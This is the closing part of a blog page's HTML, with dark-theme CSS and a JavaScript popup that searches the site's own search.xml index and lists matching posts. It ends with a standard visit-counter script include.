    [data-theme="dark"] .search-result-item { background: rgba(255,255,255,0.05); }
    [data-theme="dark"] .search-result-item:hover { background: rgba(255,255,255,0.08); }
    [data-theme="dark"] .search-result-content { color: #aaa; }
    
    /* 滚动条美化 */
    #search-result::-webkit-scrollbar { width: 6px; }
    #search-result::-webkit-scrollbar-thumb { background: #ccc; border-radius: 3px; }
  </style>

  <script>
    document.addEventListener('DOMContentLoaded', function () {
      const searchBtn = document.getElementById('nav-search-btn');
      const searchForm = document.getElementById('search-form-wrap');
      const searchClose = document.getElementById('search-close-btn');
      const searchInput = document.getElementById('search-input');
      const searchResult = document.getElementById('search-result');

      if (!searchBtn || !searchForm) return;

      // 1. 弹出逻辑：增加 e.preventDefault() 解决跳转问题
      searchBtn.onclick = function(e) {
        e.preventDefault(); // 阻止默认的跳转到页面末尾的行为
        searchForm.style.display = 'flex';
        searchInput.focus();
        if (!window.searchData) loadSearchData();
      };

      searchClose.onclick = () => { searchForm.style.display = 'none'; };
      
      // 点击遮罩层（弹窗外）关闭
      searchForm.onclick = (e) => { 
        if(e.target === searchForm) searchForm.style.display = 'none'; 
      };

      // 按下 Esc 键关闭
      document.addEventListener('keydown', (e) => {
        if (e.key === 'Escape') searchForm.style.display = 'none';
      });

      // 2. 搜索逻辑 (Local Search)
      async function loadSearchData() {
        searchResult.innerHTML = '<div style="padding:20px; text-align:center; color:#999;">正在加载索引...</div>';
        try {
          const res = await fetch('/search.xml');
          const text = await res.text();
          const xml = new DOMParser().parseFromString(text, "text/xml");
          window.searchData = Array.from(xml.querySelectorAll('entry')).map(entry => ({
            title: entry.querySelector('title').textContent,
            content: entry.querySelector('content').textContent.replace(/<[^>]+>/g, ''), // 过滤 HTML 标签
            url: entry.querySelector('url').textContent
          }));
          searchResult.innerHTML = '<div style="padding:20px; text-align:center; color:#999;">索引加载完成</div>';
        } catch (err) {
          searchResult.innerHTML = '<div style="padding:20px; text-align:center; color:red;">索引加载失败，请检查 search.xml</div>';
        }
      }

      searchInput.oninput = function() {
        const val = this.value.trim().toLowerCase();
        if (val.length < 2) { searchResult.innerHTML = ""; return; }
        
        const results = window.searchData.filter(data => 
          data.title.toLowerCase().includes(val) || data.content.toLowerCase().includes(val)
        );

        if (results.length === 0) {
          searchResult.innerHTML = '<div style="padding:20px; text-align:center; color:#999;">未找到相关文章</div>';
          return;
        }

        searchResult.innerHTML = `<ul class="search-result-list">${results.map(data => `
          <li class="search-result-item">
            <a href="${data.url}" class="search-result-title">${data.title.replace(new RegExp(val, 'gi'), m => `<em class="search-keyword">${m}</em>`)}</a>
            <p class="search-result-content">${data.content.substring(0, 150)}...</p>
          </li>`).join('')}</ul>`;
      };
    });
  </script>
  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</body>
</html>